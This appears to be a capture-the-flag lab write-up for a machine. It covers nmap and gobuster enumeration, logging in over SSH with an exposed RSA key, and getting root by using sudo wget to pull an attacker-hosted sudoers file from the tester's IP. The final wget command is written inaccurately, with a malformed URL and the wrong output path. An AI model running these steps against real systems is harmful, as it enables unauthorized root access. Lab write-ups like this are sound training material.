This is a very easy machine, in which we have to get into the machine through SSH and then we have to escalate our privileges to get the root flag.
So Our Very First step is to run the Nmap scan.
Command: nmap -T5 -p- -A <target IP>
Now in the results we found 2 open ports,
SSH and HTTP.
I have filtered the nmap scan in this screenshot.
Now we will check for the port 80.
So there is a Apache web page.
If we check it’s source code then we can see something interesting.
Here is a name “Jessie”.
Now we will do Directory Busting with the help of gobuster.
Command: gobuster dir -u <target url> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Now we have found something interesting,
We found a website in this directory.
Now we will do directory Busting on this.
Command: gobuster dir -u <target url/sitemap> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Now we have found a directory named as .ssh
If we go to this directory then we can see that there is a rsa key.
We can use this key to login to the machine through ssh.
Earlier we have found the Name “Jessie”.
Let’s Login with this username and rsa key.
We have to give permission to the rsa key file to get executable.
Command: chmod 400 <file name>
Now we will login through ssh.
Command: ssh -i <rsa file> jessie@<target IP>
We have successfully logged in to the Machine.
We can get the user flag inside “Documents” Directory.
Now we will escalate our privileges to root so that we can get the root flag.
If we list the list the privileges for the invoking user
Command: sudo -l
then we can see we can use “wget” as a root without password.
We will use this to escalate us to root user.
We have to create a sudoers file and get that sudoers file into the target machine so that Jessie can run the commands as root.
create a file and store the following:
jessie ALL=(ALL) NOPASSWD:ALL
Now we will host this file with the help of python server.
Command: python -m http.server 80
Now we will wget in our target machine to get the new sudoers file into our target machine.
Command: sudo /usr/bin/wget http<your IP:80/sudoers> -O sudoers
Now if we use the
command: sudo ls /root
it will list the files of root file.
Now we can use the
Command: sudo cat /root/root_flag.txt